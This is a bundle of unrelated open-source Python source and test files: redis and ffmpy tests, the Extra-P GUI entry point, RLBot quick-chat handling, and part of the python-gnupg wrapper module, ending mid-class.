@pytest.mark.xfail(reason="pipeline NYI")
@skip_if_server_version_lt('2.8.8')
def test_busy_loading_from_pipeline(self, r):
"""
BusyLoadingErrors should be raised from a pipeline execution
regardless of the raise_on_error flag.
"""
pipe = r.pipeline()
pipe.execute_command('DEBUG', 'ERROR', 'LOADING fake message')
with pytest.raises(redis.BusyLoadingError):
pipe.execute()
pool = r.connection_pool
assert not pipe.connection
assert len(pool._available_connections) == 1
assert not pool._available_connections[0]._sock
@skip_if_server_version_lt('2.8.8')
def test_read_only_error(self, r):
"READONLY errors get turned in ReadOnlyError exceptions"
with pytest.raises(redis.ReadOnlyError):
r.execute_command('DEBUG', 'ERROR', 'READONLY blah blah')
def test_connect_from_url_tcp(self):
connection = redis.Redis.from_url('redis://localhost')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'Connection',
'host=localhost,port=6379,db=0',
)
def test_connect_from_url_unix(self):
connection = redis.Redis.from_url('unix:///path/to/socket')
pool = connection.connection_pool
assert re.match('(.*)<(.*)<(.*)>>', repr(pool)).groups() == (
'ConnectionPool',
'UnixDomainSocketConnection',
'path=/path/to/socket,db=0',
)
|
test_cmd_execution.py
|
import os
import subprocess
import threading
import time
from unittest import mock
import pytest
from ffmpy import FFExecutableNotFoundError, FFmpeg, FFRuntimeError
def test_invalid_executable_path():
ff = FFmpeg(executable="/tmp/foo/bar/ffmpeg")
with pytest.raises(FFExecutableNotFoundError) as exc_info:
ff.run()
assert str(exc_info.value) == "Executable '/tmp/foo/bar/ffmpeg' not found"
def test_no_redirection():
global_options = "--stdin none --stdout oneline --stderr multiline --exit-code 0"
ff = FFmpeg(global_options=global_options)
stdout, stderr = ff.run()
assert stdout is None
assert stderr is None
def test_redirect_to_devnull():
global_options = "--stdin none --stdout oneline --stderr multiline --exit-code 0"
ff = FFmpeg(global_options=global_options)
devnull = open(os.devnull, "wb")
stdout, stderr = ff.run(stdout=devnull, stderr=devnull)
assert stdout is None
assert stderr is None
def test_redirect_to_pipe():
global_options = "--stdin none --stdout oneline --stderr multiline --exit-code 0"
ff = FFmpeg(global_options=global_options)
stdout, stderr = ff.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert stdout == b"This is printed to stdout"
assert stderr == b"These are\nmultiple lines\nprinted to stderr"
def test_input():
global_options = "--stdin pipe --stdout oneline --stderr multiline --exit-code 0"
ff = FFmpeg(global_options=global_options)
stdout, stderr = ff.run(
input_data=b"my input data", stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
assert stdout == b"my input data\nThis is printed to stdout"
assert stderr == b"These are\nmultiple lines\nprinted to stderr"
def test_non_zero_exitcode():
global_options = "--stdin none --stdout multiline --stderr multiline --exit-code 42"
ff = FFmpeg(global_options=global_options)
with pytest.raises(FFRuntimeError) as exc_info:
ff.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert exc_info.value.cmd == (
"ffmpeg --stdin none --stdout multiline --stderr multiline --exit-code 42"
)
assert exc_info.value.exit_code == 42
assert exc_info.value.stdout == b"These are\nmultiple lines\nprinted to stdout"
assert exc_info.value.stderr == b"These are\nmultiple lines\nprinted to stderr"
assert str(exc_info.value) == (
"`ffmpeg --stdin none --stdout multiline --stderr multiline --exit-code 42` "
"exited with status 42\n\n"
"STDOUT:\n"
"These are\n"
"multiple lines\n"
"printed to stdout\n\n"
"STDERR:\n"
"These are\n"
"multiple lines\n"
"printed to stderr"
)
def test_non_zero_exitcode_no_stderr():
global_options = "--stdin none --stdout multiline --stderr none --exit-code 42"
ff = FFmpeg(global_options=global_options)
with pytest.raises(FFRuntimeError) as exc_info:
ff.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert exc_info.value.cmd == (
"ffmpeg --stdin none --stdout multiline --stderr none --exit-code 42"
)
assert exc_info.value.exit_code == 42
assert exc_info.value.stdout == b"These are\nmultiple lines\nprinted to stdout"
assert exc_info.value.stderr == b""
assert str(exc_info.value) == (
"`ffmpeg --stdin none --stdout multiline --stderr none --exit-code 42` "
"exited with status 42\n\n"
"STDOUT:\n"
"These are\n"
"multiple lines\n"
"printed to stdout\n\n"
"STDERR:\n"
)
def test_non_zero_exitcode_no_stdout():
global_options = "--stdin none --stdout none --stderr multiline --exit-code 42"
ff = FFmpeg(global_options=global_options)
with pytest.raises(FFRuntimeError) as exc_info:
ff.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert exc_info.value.cmd == (
"ffmpeg --stdin none --stdout none --stderr multiline --exit-code 42"
)
assert exc_info.value.exit_code == 42
assert exc_info.value.stdout == b""
assert exc_info.value.stderr == b"These are\nmultiple lines\nprinted to stderr"
assert str(exc_info.value) == (
"`ffmpeg --stdin none --stdout none --stderr multiline --exit-code 42` "
"exited with status 42\n\n"
"STDOUT:\n"
"\n\n"
"STDERR:\n"
"These are\n"
"multiple lines\n"
"printed to stderr"
)
def test_non_zero_exitcode_no_stdout_and_stderr():
global_options = "--stdin none --stdout none --stderr none --exit-code 42"
ff = FFmpeg(global_options=global_options)
with pytest.raises(FFRuntimeError) as exc_info:
ff.run(stdout=subprocess.PIPE, stderr=subprocess.PIPE)
assert exc_info.value.cmd == (
"ffmpeg --stdin none --stdout none --stderr none --exit-code 42"
)
assert exc_info.value.exit_code == 42
assert exc_info.value.stdout == b""
assert exc_info.value.stderr == b""
assert str(exc_info.value) == (
"`ffmpeg --stdin none --stdout none --stderr none --exit-code 42` "
"exited with status 42\n\n"
"STDOUT:\n"
"\n\n"
"STDERR:\n"
)
def test_raise_exception_with_stdout_stderr_none():
global_options = "--stdin none --stdout none --stderr none --exit-code 42"
ff = FFmpeg(global_options=global_options)
with pytest.raises(FFRuntimeError) as exc_info:
ff.run()
assert str(exc_info.value) == (
"`ffmpeg --stdin none --stdout none --stderr none --exit-code 42` "
"exited with status 42\n\n"
"STDOUT:\n"
"\n\n"
"STDERR:\n"
)
def test_terminate_process():
global_options = "--long-run"
ff = FFmpeg(global_options=global_options)
thread_1 = threading.Thread(target=ff.run)
thread_1.start()
while not ff.process:
time.sleep(0.05)
print(ff.process.returncode)
ff.process.terminate()
thread_1.join()
assert ff.process.returncode == -15
@mock.patch("ffmpy.subprocess.Popen")
def test_custom_env(popen_mock):
ff = FFmpeg()
popen_mock.return_value.communicate.return_value = ("output", "error")
popen_mock.return_value.returncode = 0
ff.run(env="customenv")
popen_mock.assert_called_with(
mock.ANY, stdin=mock.ANY, stdout=mock.ANY, stderr=mock.ANY, env="customenv"
)
|
extrapgui.py
|
# This file is part of the Extra-P software (http://www.scalasca.org/software/extra-p)
#
# Copyright (c) 2020, Technical University of Darmstadt, Germany
#
# This software may be modified and distributed under the terms of a BSD-style license.
# See the LICENSE file in the base directory for details.
import argparse
import logging
import sys
import threading
import traceback
import warnings
from PySide2.QtCore import Qt
from PySide2.QtGui import QPalette, QColor
from PySide2.QtWidgets import QApplication, QMessageBox, QToolTip
from matplotlib import font_manager
import extrap
from extrap.fileio.cube_file_reader2 import read_cube_file
from extrap.fileio.experiment_io import read_experiment
from extrap.fileio.extrap3_experiment_reader import read_extrap3_experiment
from extrap.fileio.json_file_reader import read_json_file
from extrap.fileio.talpas_file_reader import read_talpas_file
from extrap.fileio.text_file_reader import read_text_file
from extrap.gui.MainWidget import MainWidget
from extrap.util.exceptions import RecoverableError, CancelProcessError
TRACEBACK = logging.DEBUG - 1
logging.addLevelName(TRACEBACK, 'TRACEBACK')
def main(*, args=None, test=False):
_update_mac_app_info()
# preload fonts for matplotlib
font_preloader = _preload_common_fonts()
arguments = parse_arguments(args)
# configure logging
log_level = min(logging.getLevelName(arguments.log_level.upper()), logging.INFO)
if arguments.log_file:
logging.basicConfig(format="%(levelname)s: %(asctime)s: %(message)s", level=log_level,
filename=arguments.log_file)
else:
logging.basicConfig(format="%(levelname)s: %(asctime)s: %(message)s", level=log_level)
logging.getLogger().handlers[0].setLevel(logging.getLevelName(arguments.log_level.upper()))
app = QApplication(sys.argv) if not test else QApplication.instance()
apply_style(app)
window = MainWidget()
_init_warning_system(window, test)
window.show()
try:
load_from_command(arguments, window)
except CancelProcessError:
pass
if not test:
app.exec_()
font_preloader.join()
else:
font_preloader.join()
return window, app
def parse_arguments(args=None):
parser = argparse.ArgumentParser(description=extrap.__description__)
parser.add_argument("--log", action="store", dest="log_level", type=str.lower, default='critical',
choices=['traceback', 'debug', 'info', 'warning', 'error', 'critical'],
help="set program's log level (default: critical)")
parser.add_argument("--logfile", action="store", dest="log_file",
help="set path of log file")
parser.add_argument("--version", action="version", version=extrap.__title__ + " " + extrap.__version__)
group = parser.add_mutually_exclusive_group(required=False)
group.add_argument("--cube", action="store_true", default=False, dest="cube", help="load data from cube files")
group.add_argument("--text", action="store_true", default=False, dest="text", help="load data from text files")
group.add_argument("--talpas", action="store_true", default=False, dest="talpas",
help="load data from talpas data format")
group.add_argument("--json", action="store_true", default=False, dest="json",
help="load data from json or jsonlines file")
group.add_argument("--extra-p-3", action="store_true", default=False, dest="extrap3",
help="load data from Extra-P 3 experiment")
parser.add_argument("path", metavar="FILEPATH", type=str, action="store", nargs='?',
help="specify a file path for Extra-P to work with")
parser.add_argument("--scaling", action="store", dest="scaling_type", default="weak", type=str.lower,
choices=["weak", "strong"],
help="set weak or strong scaling when loading data from cube files [weak (default), strong]")
arguments = parser.parse_args(args)
return arguments
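# Hedged usage sketch (comments only, not part of the module): how the arguments
# parsed above could look on the command line. The executable name "extrapgui"
# and the file paths are illustrative assumptions.
#
#     extrapgui --text measurements.txt --log debug --logfile /tmp/extrap.log
#     extrapgui --cube cube_experiment_dir --scaling strong
#     extrapgui --extra-p-3 old_experiment.extrap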
def load_from_command(arguments, window):
if arguments.path:
if arguments.text:
window.import_file(read_text_file, file_name=arguments.path)
elif arguments.json:
window.import_file(read_json_file, file_name=arguments.path)
elif arguments.talpas:
window.import_file(read_talpas_file, file_name=arguments.path)
elif arguments.cube:
window.import_file(lambda x, y: read_cube_file(x, arguments.scaling_type, y), file_name=arguments.path)
elif arguments.extrap3:
window.import_file(read_extrap3_experiment, model=False, file_name=arguments.path)
else:
window.import_file(read_experiment, model=False, file_name=arguments.path)
def _init_warning_system(window, test=False):
open_message_boxes = []
current_warnings = set()
# save old handlers
_old_warnings_handler = warnings.showwarning
_old_exception_handler = sys.excepthook
def activate_box(box):
box.raise_()
box.activateWindow()
def display_messages(event):
for w in open_message_boxes:
w.raise_()
w.activateWindow()
if sys.platform.startswith('darwin'):
window.activate_event_handlers.append(display_messages)
def _warnings_handler(message: Warning, category, filename, lineno, file=None, line=None):
nonlocal current_warnings
message_str = str(message)
if message_str not in current_warnings:
warn_box = QMessageBox(QMessageBox.Warning, 'Warning', message_str, QMessageBox.Ok, window)
warn_box.setModal(False)
warn_box.setAttribute(Qt.WA_DeleteOnClose)
warn_box.destroyed.connect(
lambda x: (current_warnings.remove(message_str), open_message_boxes.remove(warn_box)))
if not test:
warn_box.show()
activate_box(warn_box)
open_message_boxes.append(warn_box)
current_warnings.add(message_str)
_old_warnings_handler(message, category, filename, lineno, file, line)
logging.warning(message_str)
logging.log(TRACEBACK, ''.join(traceback.format_stack()))
QApplication.processEvents()
def _exception_handler(type, value, traceback_):
traceback_text = ''.join(traceback.extract_tb(traceback_).format())
if issubclass(type, CancelProcessError):
logging.log(TRACEBACK, str(value))
logging.log(TRACEBACK, traceback_text)
return
parent, modal = _parent(window)
msg_box = QMessageBox(QMessageBox.Critical, 'Error', str(value), QMessageBox.Ok, parent)
if hasattr(value, 'NAME'):
msg_box.setWindowTitle(getattr(value, 'NAME'))
msg_box.setDetailedText(traceback_text)
open_message_boxes.append(msg_box)
logging.error(str(value))
logging.log(TRACEBACK, traceback_text)
if test:
return _old_exception_handler(type, value, traceback_)
_old_exception_handler(type, value, traceback_)
if issubclass(type, RecoverableError):
msg_box.open()
activate_box(msg_box)
else:
activate_box(msg_box)
msg_box.exec_() # ensures waiting
exit(1)
warnings.showwarning = _warnings_handler
sys.excepthook = _exception_handler
warnings.simplefilter('always', UserWarning)
def apply_style(app):
app.setStyle('Fusion')
palette = QPalette()
palette.setColor(QPalette.Window, QColor(190, 190, 190))
palette.setColor(QPalette.WindowText, Qt.black)
palette.setColor(QPalette.Base, QColor(220, 220, 220))
palette.setColor(QPalette.AlternateBase, QColor(10, 10, 10))
palette.setColor(QPalette.Text, Qt.black)
palette.setColor(QPalette.Button, QColor(220, 220, 220))
palette.setColor(QPalette.ButtonText, Qt.black)
palette.setColor(QPalette.Highlight, QColor(31, 119, 180))
palette.setColor(QPalette.HighlightedText, Qt.white)
palette.setColor(QPalette.ToolTipBase, QColor(230, 230, 230))
palette.setColor(QPalette.ToolTipText, Qt.black)
palette.setColor(QPalette.Disabled, QPalette.Text, QColor(80, 80, 80))
palette.setColor(QPalette.Disabled, QPalette.ButtonText, QColor(80, 80, 80))
palette.setColor(QPalette.Disabled, QPalette.Button, QColor(150, 150, 150))
app.setPalette(palette)
QToolTip.setPalette(palette)
def _preload_common_fonts():
common_fonts = [
font_manager.FontProperties('sans\\-serif:style=normal:variant=normal:weight=normal:stretch=normal:size=10.0'),
'STIXGeneral', 'STIXGeneral:italic', 'STIXGeneral:weight=bold',
'STIXNonUnicode', 'STIXNonUnicode:italic', 'STIXNonUnicode:weight=bold',
'STIXSizeOneSym', 'STIXSizeTwoSym', 'STIXSizeThreeSym', 'STIXSizeFourSym', 'STIXSizeFiveSym',
'cmsy10', 'cmr10', 'cmtt10', 'cmmi10', 'cmb10', 'cmss10', 'cmex10',
'DejaVu Sans', 'DejaVu Sans:italic', 'DejaVu Sans:weight=bold', 'DejaVu Sans Mono', 'DejaVu Sans Display',
font_manager.FontProperties('sans\\-serif:style=normal:variant=normal:weight=normal:stretch=normal:size=12.0'),
font_manager.FontProperties('sans\\-serif:style=normal:variant=normal:weight=normal:stretch=normal:size=6.0')
]
def _thread(fonts):
for f in fonts:
font_manager.findfont(f)
thread = threading.Thread(target=_thread, args=(common_fonts,))
thread.start()
return thread
def _parent(window):
if not sys.platform.startswith('darwin'):
return window, False
modal = QApplication.activeModalWidget()
parent = modal if modal else window
return parent, bool(modal)
def _update_mac_app_info():
if sys.platform.startswith('darwin'):
try:
from Foundation import NSBundle # noqa
bundle = NSBundle.mainBundle()
if bundle:
app_info = bundle.localizedInfoDictionary() or bundle.infoDictionary()
if app_info:
app_info['CFBundleName'] = extrap.__title__
from AppKit import NSWindow
NSWindow.setAllowsAutomaticWindowTabbing_(False)
except ImportError:
pass
if __name__ == "__main__":
main()
|
quick_chats.py
|
import flatbuffers
import multiprocessing
import queue
from threading import Thread
from rlbot.messages.flat import QuickChat
from rlbot.messages.flat import QuickChatSelection
from rlbot.utils.logging_utils import get_logger
from rlbot.utils.structures.utils import create_enum_object
"""
Look for quick chats from here:
https://github.com/RLBot/RLBot/blob/master/src/main/flatbuffers/rlbot.fbs
"""
QuickChats = create_enum_object([chat for chat in dir(QuickChatSelection.QuickChatSelection)
if not chat.startswith('__')
and not callable(getattr(QuickChatSelection.QuickChatSelection, chat))],
list_name='quick_chat_list',
other_attributes=[
('CHAT_NONE', -1),
('CHAT_EVERYONE', False),
('CHAT_TEAM_ONLY', True)
],
attribute_object=QuickChatSelection.QuickChatSelection)
def send_quick_chat_flat(game_interface, index, team, team_only, quick_chat):
builder = flatbuffers.Builder(0)
QuickChat.QuickChatStart(builder)
QuickChat.QuickChatAddQuickChatSelection(builder, quick_chat)
QuickChat.QuickChatAddPlayerIndex(builder, index)
QuickChat.QuickChatAddTeamOnly(builder, team_only)
result = QuickChat.QuickChatEnd(builder)
builder.Finish(result)
game_interface.send_chat_flat(builder)
def send_quick_chat(queue_holder, index, team, team_only, quick_chat):
"""
Sends a quick chat to the general queue for everyone to pull from
:param queue_holder:
:param index: The index of the player sending the message
:param team: The team of the player sending the message
:param team_only: if the message is team only
:param quick_chat: The contents of the quick chat
:return:
"""
queue_holder["output"].put((index, team, team_only, quick_chat))
def register_for_quick_chat(queue_holder, called_func, quit_event):
"""
Registers a function to be called anytime this queue gets a quick chat.
:param queue_holder: This holds the queues for the bots
:param called_func: This is the function that is called when a quick chat is received
:param quit_event: This event will be set when rlbot is trying to shut down
:return: The newly created thread.
"""
def threaded_func(chat_queue, called_func, quit_event):
while not quit_event.is_set():
try:
next_message = chat_queue.get(timeout=0.01)
index, team, chat = next_message
called_func(index, team, chat)
except queue.Empty:
pass
return
thread = Thread(target=threaded_func, args=(queue_holder["input"], called_func, quit_event))
thread.start()
return thread
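# Hedged usage sketch (comments only, not part of the module): wiring a bot-side
# callback through register_for_quick_chat using a queue_holder produced by
# QuickChatManager.create_queue_for_bot below. The names `manager`, `index`,
# `team`, `quit_event` and the selection `Compliments_NiceShot` are illustrative
# assumptions, not guaranteed identifiers.
#
#     queue_holder = manager.create_queue_for_bot(index, team)
#
#     def on_chat(sender_index, sender_team, chat):
#         print(sender_index, sender_team, QuickChats.quick_chat_list[chat])
#
#     chat_thread = register_for_quick_chat(queue_holder, on_chat, quit_event)
#     send_quick_chat(queue_holder, index, team, QuickChats.CHAT_EVERYONE,
#                     QuickChats.Compliments_NiceShot)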
class QuickChatManager:
bot_queues = {}
def __init__(self, game_interface):
self.game_interface = game_interface
self.manager = multiprocessing.Manager()
self.general_chat_queue = self.manager.Queue()
self.logger = get_logger('chats')
def create_queue_for_bot(self, index, team):
bot_queue = self.manager.Queue()
queue_holder = dict()
queue_holder["input"] = bot_queue
queue_holder["output"] = self.general_chat_queue
self.bot_queues[index] = (team, bot_queue)
return queue_holder
def process_queue(self, quit_event):
while not quit_event.is_set():
try:
next_message = self.general_chat_queue.get(timeout=0.01)
index, team, team_only, message_details = next_message
self.logger.debug('got quick chat from bot %s on team %s with message %s:', index, team,
QuickChats.quick_chat_list[message_details])
for i in self.bot_queues:
bots = self.bot_queues[i]
if i == index:
# do not send yourself a message
continue
if bots[0] != team and team_only:
# do not send to other team if team only
continue
bots[1].put((index, team, message_details))
self.game_interface.send_chat(index, team_only, message_details)
except queue.Empty:
pass
def start_manager(self, quit_event):
thread = Thread(target=self.process_queue, args=(quit_event,))
thread.start()
return thread
|
_gnupg.py
|
# Copyright (c) 2008-2011 by Vinay Sajip.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name(s) of the copyright holder(s) may not be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDER(S) "AS IS" AND ANY EXPRESS OR
# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO
# EVENT SHALL THE COPYRIGHT HOLDER(S) BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
""" A wrapper for the 'gpg' command::
Portions of this module are derived from A.M. Kuchling's well-designed
GPG.py, using Richard Jones' updated version 1.3, which can be found
in the pycrypto CVS repository on Sourceforge:
http://pycrypto.cvs.sourceforge.net/viewvc/pycrypto/gpg/GPG.py
This module is *not* forward-compatible with amk's; some of the
old interface has changed. For instance, since I've added decrypt
functionality, I elected to initialize with a 'gnupghome' argument
instead of 'keyring', so that gpg can find both the public and secret
keyrings. I've also altered some of the returned objects in order for
the caller to not have to know as much about the internals of the
result classes.
While the rest of ISconf is released under the GPL, I am releasing
this single file under the same terms that A.M. Kuchling used for
pycrypto.
Steve Traugott, stevegt@terraluna.org
Thu Jun 23 21:27:20 PDT 2005
This version of the module has been modified from Steve Traugott's version
(see http://trac.t7a.org/isconf/browser/trunk/lib/python/isconf/GPG.py) by
Vinay Sajip to make use of the subprocess module (Steve's version uses os.fork()
and so does not work on Windows). Renamed to gnupg.py to avoid confusion with
the previous versions.
Modifications Copyright (C) 2008-2011 Vinay Sajip. All rights reserved.
A unittest harness (test_gnupg.py) has also been added.
"""
__author__ = "Vinay Sajip"
__date__ = "$02-Sep-2011 13:18:12$"
try:
from io import StringIO
except ImportError:
from cStringIO import StringIO
import codecs
import locale
import logging
import os
import socket
from subprocess import Popen
from subprocess import PIPE
import sys
import threading
try:
from logging import NullHandler
except ImportError:
class NullHandler(logging.Handler):
def handle(self, record):
pass
try:
unicode
_py3k = False
except NameError:
_py3k = True
logger = logging.getLogger(__name__)
if not logger.handlers:
logger.addHandler(NullHandler())
def _copy_data(instream, outstream):
# Copy one stream to another
sent = 0
if hasattr(sys.stdin, 'encoding'):
enc = sys.stdin.encoding
else:
enc = 'ascii'
while True:
data = instream.read(1024)
if len(data) == 0:
break
sent += len(data)
logger.debug("sending chunk (%d): %r", sent, data[:256])
try:
outstream.write(data)
except UnicodeError:
outstream.write(data.encode(enc))
except:
# Can sometimes get 'broken pipe' errors even when the data has all
# been sent
logger.exception('Error sending data')
break
try:
outstream.close()
except IOError:
logger.warning('Exception occurred while closing: ignored', exc_info=1)
logger.debug("closed output, %d bytes sent", sent)
def _threaded_copy_data(instream, outstream):
wr = threading.Thread(target=_copy_data, args=(instream, outstream))
wr.setDaemon(True)
logger.debug('data copier: %r, %r, %r', wr, instream, outstream)
wr.start()
return wr
def _write_passphrase(stream, passphrase, encoding):
passphrase = '%s\n' % passphrase
passphrase = passphrase.encode(encoding)
stream.write(passphrase)
logger.debug("Wrote passphrase: %r", passphrase)
def _is_sequence(instance):
return isinstance(instance,list) or isinstance(instance,tuple)
def _make_binary_stream(s, encoding):
try:
if _py3k:
if isinstance(s, str):
s = s.encode(encoding)
else:
if type(s) is not str:
s = s.encode(encoding)
from io import BytesIO
rv = BytesIO(s)
except ImportError:
rv = StringIO(s)
return rv
class Verify(object):
"Handle status messages for --verify"
def __init__(self, gpg):
self.gpg = gpg
self.valid = False
self.fingerprint = self.creation_date = self.timestamp = None
self.signature_id = self.key_id = None
self.username = None
def __nonzero__(self):
return self.valid
__bool__ = __nonzero__
def handle_status(self, key, value):
if key in ("TRUST_UNDEFINED", "TRUST_NEVER", "TRUST_MARGINAL",
"TRUST_FULLY", "TRUST_ULTIMATE", "RSA_OR_IDEA", "NODATA",
"IMPORT_RES", "PLAINTEXT", "PLAINTEXT_LENGTH"):
pass
elif key == "BADSIG":
self.valid = False
self.status = 'signature bad'
self.key_id, self.username = value.split(None, 1)
elif key == "GOODSIG":
self.valid = True
self.status = 'signature good'
self.key_id, self.username = value.split(None, 1)
elif key == "VALIDSIG":
(self.fingerprint,
self.creation_date,
self.sig_timestamp,
self.expire_timestamp) = value.split()[:4]
# may be different if signature is made with a subkey
self.pubkey_fingerprint = value.split()[-1]
self.status = 'signature valid'
elif key == "SIG_ID":
(self.signature_id,
self.creation_date, self.timestamp) = value.split()
elif key == "ERRSIG":
self.valid = False
(self.key_id,
algo, hash_algo,
cls,
self.timestamp) = value.split()[:5]
self.status = 'signature error'
elif key == "NO_PUBKEY":
self.valid = False
self.key_id = value
self.status = 'no public key'
elif key in ("KEYEXPIRED", "SIGEXPIRED"):
# these are useless in verify, since they are spit out for any
# pub/subkeys on the key, not just the one doing the signing.
# if we want to check for signatures with expired key,
# the relevant flag is EXPKEYSIG.
pass
elif key in ("EXPKEYSIG", "REVKEYSIG"):
# signed with expired or revoked key
self.valid = False
self.key_id = value.split()[0]
self.status = (('%s %s') % (key[:3], key[3:])).lower()
else:
raise ValueError("Unknown status message: %r" % key)
class ImportResult(object):
"Handle status messages for --import"
counts = '''count no_user_id imported imported_rsa unchanged
n_uids n_subk n_sigs n_revoc sec_read sec_imported
sec_dups not_imported'''.split()
def __init__(self, gpg):
self.gpg = gpg
self.imported = []
self.results = []
self.fingerprints = []
for result in self.counts:
setattr(self, result, None)
def __nonzero__(self):
if self.not_imported: return False
if not self.fingerprints: return False
return True
__bool__ = __nonzero__
ok_reason = {
'0': 'Not actually changed',
'1': 'Entirely new key',
'2': 'New user IDs',
'4': 'New signatures',
'8': 'New subkeys',
'16': 'Contains private key',
}
problem_reason = {
'0': 'No specific reason given',
'1': 'Invalid Certificate',
'2': 'Issuer Certificate missing',
'3': 'Certificate Chain too long',
'4': 'Error storing certificate',
}
def handle_status(self, key, value):
if key == "IMPORTED":
# this duplicates info we already see in import_ok & import_problem
pass
elif key == "NODATA":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'No valid data found'})
elif key == "IMPORT_OK":
reason, fingerprint = value.split()
reasons = []
for code, text in list(self.ok_reason.items()):
if int(reason) | int(code) == int(reason):
reasons.append(text)
reasontext = '\n'.join(reasons) + "\n"
self.results.append({'fingerprint': fingerprint,
'ok': reason, 'text': reasontext})
self.fingerprints.append(fingerprint)
elif key == "IMPORT_PROBLEM":
try:
reason, fingerprint = value.split()
except:
reason = value
fingerprint = '<unknown>'
self.results.append({'fingerprint': fingerprint,
'problem': reason, 'text': self.problem_reason[reason]})
elif key == "IMPORT_RES":
import_res = value.split()
for i in range(len(self.counts)):
setattr(self, self.counts[i], int(import_res[i]))
elif key == "KEYEXPIRED":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Key expired'})
elif key == "SIGEXPIRED":
self.results.append({'fingerprint': None,
'problem': '0', 'text': 'Signature expired'})
else:
raise ValueError("Unknown status message: %r" % key)
def summary(self):
l = []
l.append('%d imported'%self.imported)
if self.not_imported:
l.append('%d not imported'%self.not_imported)
return ', '.join(l)
class ListKeys(list):
''' Handle status messages for --list-keys.
Handle pub and uid (relating the latter to the former).
Don't care about (info from src/DETAILS):
crt = X.509 certificate
crs = X.509 certificate and private key available
sub = subkey (secondary key)
ssb = secret subkey (secondary key)
uat = user attribute (same as user id except for field 10).
sig = signature
rev = revocation signature
pkd = public key data (special field format, see below)
grp = reserved for gpgsm
rvk = revocation key
'''
def __init__(self, gpg):
self.gpg = gpg
self.curkey = None
self.fingerprints = []
self.uids = []
def key(self, args):
vars = ("""
type trust length algo keyid date expires dummy ownertrust uid
""").split()
self.curkey = {}
for i in range(len(vars)):
self.curkey[vars[i]] = args[i]
self.curkey['uids'] = []
if self.curkey['uid']:
self.curkey['uids'].append(self.curkey['uid'])
del self.curkey['uid']
self.append(self.curkey)
pub = sec = key
def fpr(self, args):
self.curkey['fingerprint'] = args[9]
self.fingerprints.append(args[9])
def uid(self, args):
self.curkey['uids'].append(args[9])
self.uids.append(args[9])
def handle_status(self, key, value):
pass
class Crypt(Verify):
"Handle status messages for --encrypt and --decrypt"
def __init__(self, gpg):
Verify.__init__(self, gpg)
self.data = ''
self.ok = False
self.status = ''
def __nonzero__(self):
if self.ok: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.data.decode(self.gpg.encoding, self.gpg.decode_errors)
def handle_status(self, key, value):
if key in ("ENC_TO", "USERID_HINT", "GOODMDC", "END_DECRYPTION",
"BEGIN_SIGNING", "NO_SECKEY", "ERROR", "NODATA"):
# in the case of ERROR, this is because a more specific error
# message will have come first
pass
elif key in ("NEED_PASSPHRASE", "BAD_PASSPHRASE", "GOOD_PASSPHRASE",
"MISSING_PASSPHRASE", "DECRYPTION_FAILED",
"KEY_NOT_CREATED"):
self.status = key.replace("_", " ").lower()
elif key == "NEED_PASSPHRASE_SYM":
self.status = 'need symmetric passphrase'
elif key == "BEGIN_DECRYPTION":
self.status = 'decryption incomplete'
elif key == "BEGIN_ENCRYPTION":
self.status = 'encryption incomplete'
elif key == "DECRYPTION_OKAY":
self.status = 'decryption ok'
self.ok = True
elif key == "END_ENCRYPTION":
self.status = 'encryption ok'
self.ok = True
elif key == "INV_RECP":
self.status = 'invalid recipient'
elif key == "KEYEXPIRED":
self.status = 'key expired'
elif key == "SIG_CREATED":
self.status = 'sig created'
elif key == "SIGEXPIRED":
self.status = 'sig expired'
else:
Verify.handle_status(self, key, value)
class GenKey(object):
"Handle status messages for --gen-key"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.fingerprint = None
def __nonzero__(self):
if self.fingerprint: return True
return False
__bool__ = __nonzero__
def __str__(self):
return self.fingerprint or ''
def handle_status(self, key, value):
if key in ("PROGRESS", "GOOD_PASSPHRASE", "NODATA"):
pass
elif key == "KEY_CREATED":
(self.type,self.fingerprint) = value.split()
else:
raise ValueError("Unknown status message: %r" % key)
class DeleteResult(object):
"Handle status messages for --delete-key and --delete-secret-key"
def __init__(self, gpg):
self.gpg = gpg
self.status = 'ok'
def __str__(self):
return self.status
problem_reason = {
'1': 'No such key',
'2': 'Must delete secret key first',
'3': 'Ambiguous specification',
}
def handle_status(self, key, value):
if key == "DELETE_PROBLEM":
self.status = self.problem_reason.get(value,
"Unknown error: %r" % value)
else:
raise ValueError("Unknown status message: %r" % key)
class Sign(object):
"Handle status messages for --sign"
def __init__(self, gpg):
self.gpg = gpg
self.type = None
self.fingerprint = None
def __nonzero__(self):
return self.fingerprint is not None
__bool__ = __nonzero__
def __str__(self):
return self.data.decode(self.gpg.encoding, self.gpg.decode_errors)
def handle_status(self, key, value):
